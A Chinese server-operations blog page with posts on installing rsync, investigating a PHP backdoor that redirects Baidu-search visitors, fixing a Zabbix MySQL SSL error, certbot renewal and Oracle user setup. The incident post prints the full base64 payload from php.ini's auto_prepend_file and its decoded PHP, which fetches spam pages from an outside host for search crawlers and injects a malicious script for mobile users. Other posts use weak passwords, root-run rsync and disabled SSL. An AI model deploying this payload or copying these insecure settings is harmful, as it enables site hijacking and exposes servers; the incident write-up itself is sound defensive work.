Rootop 服务器运维与web架构

2023-07-10
发表者 Venus
rsync-3.2.7安装配置已关闭评论

rsync-3.2.7安装配置

跟之前3.1.0版本有些变化,作为记录。
官方文档:https://download.samba.org/pub/rsync/INSTALL
# 服务端安装

wget -c https://download.samba.org/pub/rsync/src/rsync-3.2.7.tar.gz
tar zxvf rsync-3.2.7.tar.gz 
cd rsync-3.2.7/
yum -y install gcc gcc-c++ gawk autoconf automake python3-pip openssl-devel acl libacl-devel  attr libattr-devel xxhash-devel libzstd-devel lz4-devel
./configure --prefix=/usr/local/rsync
make
make install

# 配置文件

[root@database02 data]# cat /etc/rsyncd.conf 
trict modes = yes     
uid = root                   
gid = root                   
port = 873                  
hosts allow = 114.114.114.114
hosts deny = 0.0.0.0/32              
use chroot = no
max connections = 1000
timeout = 10
pid file = /var/run/rsyncd.pid
lock file = /var/run/rsync.lock
log file = /var/log/rsyncd.log

# 发布项目
[test]       
path = /data/
ignore errors                       
read only = no                    
write only = no                  
list = no                               
auth users = root              
secrets file = /etc/rsync.passwd

# 认证文件

[root@database02 data]# cat /etc/rsync.passwd 
root:123321
# 修改权限,否则客户端输入密码后会提示auth failed
[root@database02 data]# chmod 600 /etc/rsync.passwd

# 启动

[root@database02 data]# /usr/local/rsync/bin/rsync --daemon

2023-06-30
发表者 Venus
百度搜索网站域名点击后跳转到恶意网站的排查思路已关闭评论

百度搜索网站域名点击后跳转到恶意网站的排查思路

用户反馈用手机浏览器打开百度,搜索网站域名,点击会跳转到恶意网站。而且是服务器里所有网站都这样。

通过浏览器F12模拟手机访问,发现可以跳转,并在网络菜单中看到首页的响应内容为:

<script src=https://www.bhu456.com/js3.js></script>

可以确定是植入了恶意代码

开始以为是修改了网站代码,经过排查代码也未发现异常,此时用户说网站代码已经备份,只留了一个空的php首页,访问依旧会跳转。

这就说明恶意代码并没有修改网站的代码而实现跳转。

排查过程:
1、nginx虚拟主机配置文件,无异常
2、nginx的lua模块代码,无异常
3、伪静态配置,无异常
4、查php的载入模块(extension),无异常(此时是通过cat php.ini | grep extension方式查询,所以并没有发现恶意配置)

停止php-fpm服务以后,访问网站会报502,不会跳转,说明跳转还是通过php服务实现的,可以确定跟nginx及lua模块没有关系了。

查php的配置文件,最终在php.ini中找到如下配置:

auto_prepend_file ="data:;base64,PD9waHAgc2V0X3RpbWVfbGltaXQoMCk7ZXJyb3JfcmVwb3J0aW5nKDApO2hlYWRlcigiQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7Y2hhcnNldD11dGYtOCIpOyRhPSJzdHJpc3RyIjskYj0kX1NFUlZFUjtmdW5jdGlvbiBodHRwR2V0bGFpKCRjKXskZD1jdXJsX2luaXQoKTtjdXJsX3NldG9wdCgkZCxDVVJMT1BUX1VSTCwkYyk7Y3VybF9zZXRvcHQoJGQsQ1VSTE9QVF9VU0VSQUdFTlQsJ01vemlsbGEvNS4wIChjb21wYXRpYmxlOyBCYWlkdXNwaWRlci8yLjA7ICtodHRwOi8vd3d3LmJhaWR1LmNvbS9zZWFyY2gvc3BpZGVyLmh0bWwpJyk7Y3VybF9zZXRvcHQoJGQsQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUixGQUxTRSk7Y3VybF9zZXRvcHQoJGQsQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCxGQUxTRSk7Y3VybF9zZXRvcHQoJGQsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTtjdXJsX3NldG9wdCgkZCxDVVJMT1BUX0hFQURFUiwwKTskZT1jdXJsX2V4ZWMoJGQpO2N1cmxfY2xvc2UoJGQpO3JldHVybiAkZTt9ZGVmaW5lKCd1cmwnLCRiWydSRVFVRVNUX1VSSSddKTtkZWZpbmUoJ3JlZicsIWlzc2V0KCRiWydIVFRQX1JFRkVSRVInXSk/Jyc6JGJbJ0hUVFBfUkVGRVJFUiddKTtkZWZpbmUoJ2VudCcsJGJbJ0hUVFBfVVNFUl9BR0VOVCddKTtkZWZpbmUoJ3NpdGUnLCJodHRwOi8vd3d3LnZmcjc4OS5jb20vdXRmOC8/Iik7ZGVmaW5lKCdyb2FkJywiYXBwP2RvbWFpbj0iLiRiWydIVFRQX0hPU1QnXS4iJnBhdGg9Ii51cmwuIiZzcGlkZXI9Ii51cmxlbmNvZGUoZW50KSk7ZGVmaW5lKCdtZW1lcycscm9hZC4iJnJlZmVyZXI9Ii51cmxlbmNvZGUocmVmKSk7ZGVmaW5lKCdyZWdzJywnQEJhaWR1U3BpZGVyfFNvZ291fFlpc291fEhhb3NvdXwzNjBTcGlkZXJAaScpO2RlZmluZSgnbW9iaWxlJywnL3Bob25lfHBhZHxwb2R8aVBob25lfGlQb2R8aW9zfGlQYWR8QW5kcm9pZHxNb2JpbGV8QmxhY2tCZXJyeXxJRU1vYmlsZXxNUVFCcm93c2VyfEpVQ3xGZW5uZWN8d09TQnJvd3NlcnxCcm93c2VyTkd8V2ViT1N8U3ltYmlhbnxXaW5kb3dzIFBob25lLycpO2RlZmluZSgnYXJlYScsJGEodXJsLCIueG1sIilvciAkYSh1cmwsIi5mZGMiKW9yICRhKHVybCwiLm9uZSIpb3IgJGEodXJsLCIuYnVnIilvciAkYSh1cmwsIi5kb2MiKW9yICRhKHVybCwiLmxvdmUiKW9yICRhKHVybCwiLnR4dCIpb3IgJGEodXJsLCIucHB0IilvciAkYSh1cmwsIi5wcHR4IilvciAkYSh1cmwsIi54bHMiKW9yICRhKHVybCwiLmNzdiIpb3IgJGEodXJsLCIuc2h0bWwiKW9yICRhKHVybCwiLnpuYiIpb3IgJGEodXJsLCIuYXNwIilvciAkYSh1cmwsIi5tZGIiKW9yICRhKHVybCwiLmh4YyIpKTtpZihwcmVnX21hdGNoKHJlZ3MsZW50KSl7aWYoYXJlYSl7ZWNobyBodHRwR2V0bGFpKHNpdGUucm9hZCk7ZXhpdDt9ZWxzZXtlY2hvIGh0dHBHZXRsYWkoImh0dHA6Ly93d3cudmZyNzg5LmNvbS91dGY4L3UucGhwIik7b2JfZmx1c2goKTtmbHVzaCgpO319aWYoYXJlYSYmcHJlZ19tYXRjaChtb2JpbGUsZW50KSl7ZWNobyBiYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNITTZMeTkzZDNjdVltaDFORFUyTG1OdmJTOXFjek11YW5NK1BDOXpZM0pwY0hRKycpO2V4aXQ7fT8+"

经过base64反解后,可以看到恶意代码了:

<?php 
set_time_limit(0);
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
$a = "stristr";
$b = $_SERVER;

function httpGetlai($c) {
    $d = curl_init();
    curl_setopt($d, CURLOPT_URL, $c);
    curl_setopt($d, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');
    curl_setopt($d, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($d, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($d, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($d, CURLOPT_HEADER, 0);
    $e = curl_exec($d);
    curl_close($d);
    return $e;
}
define('url', $b['REQUEST_URI']);
define('ref', !isset($b['HTTP_REFERER']) ? '' : $b['HTTP_REFERER']);
define('ent', $b['HTTP_USER_AGENT']);
define('site', "http://www.vfr789.com/utf8/?");
define('road', "app?domain=".$b['HTTP_HOST'].
    "&path=".url.
    "&spider=".urlencode(ent));
define('memes', road.
    "&referer=".urlencode(ref));
define('regs', '@BaiduSpider|Sogou|Yisou|Haosou|360Spider@i');
define('mobile', '/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/');
define('area', $a(url, ".xml") or $a(url, ".fdc") or $a(url, ".one") or $a(url, ".bug") or $a(url, ".doc") or $a(url, ".love") or $a(url, ".txt") or $a(url, ".ppt") or $a(url, ".pptx") or $a(url, ".xls") or $a(url, ".csv") or $a(url, ".shtml") or $a(url, ".znb") or $a(url, ".asp") or $a(url, ".mdb") or $a(url, ".hxc"));
if (preg_match(regs, ent)) {
    if (area) {
        echo httpGetlai(site.road);
        exit;
    } else {
        echo httpGetlai("http://www.vfr789.com/utf8/u.php");
        ob_flush();
        flush();
    }
}
if (area && preg_match(mobile, ent)) {
    echo base64_decode('PHNjcmlwdCBzcmM9aHR0cHM6Ly93d3cuYmh1NDU2LmNvbS9qczMuanM+PC9zY3JpcHQ+');
    exit;
} 

?>

echo base64_decode('PHNjcmlwdCBzcmM9aHR0cHM6Ly93d3cuYmh1NDU2LmNvbS9qczMuanM+PC9zY3JpcHQ+');

这段base64反解以后就是上面页面响应的内容。

<script src=https://www.bhu456.com/js3.js></script>

auto_prepend_file配置参数的作用:
如果希望使用require()将页眉和脚注加入到每个页面中,除了使用require函数引入外,还可以使用配置文件设置。
在配置文件php.ini中有两个选项 auto_prepend_file 和 auto_append_file。
通过这两个选项来设置页眉和脚注,可以保证它们在每个页面的前后被载入。
使用这些指令包含的文件可以像使用include()语句包含的文件一样;也就是,如果该文件不存在,将产生一个警告。

此时还未查到是怎么被修改的配置文件。

2023-06-29
发表者 Venus
MySQL server is not available. Waiting 5 seconds已关闭评论

MySQL server is not available. Waiting 5 seconds

docker部署zabbix,访问zabbix web页面时,报数据库找不到表,应该是初始化时,sql脚本未导入到zabbix库中。

# 查看zabbix-server日志
docker logs compose_zabbix-server_1 -f

一直报如下错误:

**** MySQL server is not available. Waiting 5 seconds...

# 在 zabbix-server 中用mysql命令连接数据库提示ssl的问题。

ERROR 2026 (HY000): SSL connection error: error:1425F102:SSL routines:ssl_choose_client_version:unsupported protocol

# 查看数据库中关于ssl关键词的变量

mysql> show variables like '%ssl%';
+---------------+-----------------+
| Variable_name | Value           |
+---------------+-----------------+
| have_openssl  | YES             |
| have_ssl      | YES             |
| ssl_ca        | ca.pem          |
| ssl_capath    |                 |
| ssl_cert      | server-cert.pem |
| ssl_cipher    |                 |
| ssl_crl       |                 |
| ssl_crlpath   |                 |
| ssl_key       | server-key.pem  |
+---------------+-----------------+
9 rows in set (0.00 sec)

# 添加 skip-ssl 这行

root@d6fcbeeee611:~# cat /etc/mysql/conf.d/docker.cnf 
[mysqld]
skip-host-cache
skip-name-resolve
skip-ssl

重启mysql容器

# 再次查看ssl状态变为关闭

mysql> show variables like '%ssl%';
+---------------+----------+
| Variable_name | Value    |
+---------------+----------+
| have_openssl  | DISABLED |
| have_ssl      | DISABLED |
| ssl_ca        |          |
| ssl_capath    |          |
| ssl_cert      |          |
| ssl_cipher    |          |
| ssl_crl       |          |
| ssl_crlpath   |          |
| ssl_key       |          |
+---------------+----------+
9 rows in set (0.00 sec)

重新 docker-compose up 导入成功。

ssl参数是启用ssl连接

root@82a862f5f9f5:/# mysqld --verbose --help |grep ssl
  --ssl               Enable SSL for connection (automatically enabled with
                      (Defaults to on; use --skip-ssl to disable.)

2023-06-27
发表者 Venus
certbot申请证书及更新已关闭评论

certbot申请证书及更新

yum install -y epel-*
yum install certbot

# 申请证书
certbot certonly -d d1.rootop.org --webroot -w /usr/share/nginx/html/d1/ -m xxx@xxx.com -n

-d 指定域名
--webroot 是使用文件验证方式,会在网站根目录下自动创建文件夹及验证文件
-w 指定网站根目录路径
-m 指定一个邮箱
-n 不交互 申请

# nginx访问日志可以看到是进行文件验证
23.178.112.202 - - [27/Jun/2023:09:16:37 +0800] "GET /.well-known/acme-challenge/ziAcQFRDITwWwCjYzpeISyTXKmyX47lAM4xD0-cZOKA HTTP/1.1" 200 87 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"

# 证书路径
/etc/letsencrypt/live/域名/
 

# 官网限制7天只能重复申请5次
# 证书到期前30天可以再次申请,也可以强制重新申请

certbot renew --force-renew --deploy-hook "nginx -t && nginx -s reload"

--deploy-hook 是申请证书以后执行一个命令,这里实现重启nginx重新载入证书。

# 查看当前所有证书的信息
certbot certificates

certbot 强制更新证书只用加上 --force-renewal 参数, 执行命令 certbot renew --force-renewal即可。
如果是想更新指定的证书使用参数 --cert-name x.x.com
certbot renew --cert-name x.x.com --force-renewal

2023-05-17
发表者 Venus
oracle创建表空间及用户已关闭评论

oracle创建表空间及用户

create tablespace api 
datafile '/home/software/oracle/api.dbf' 
size 1500M 
autoextend on next 5M maxsize 3000M;

# 删除表空间

drop tablespace api including contents and datafiles

# 建用户

create user api_user_rw identified by 123456 default tablespace api;

# 赋权

grant connect,resource to api_user_rw;
grant create any sequence to api_user_rw;
grant create any table to api_user_rw;
grant delete any table to api_user_rw;
grant insert any table to api_user_rw;
grant select any table to api_user_rw;
grant unlimited tablespace to api_user_rw;
grant execute any procedure to api_user_rw;
grant update any table to api_user_rw;
grant create any view to api_user_rw;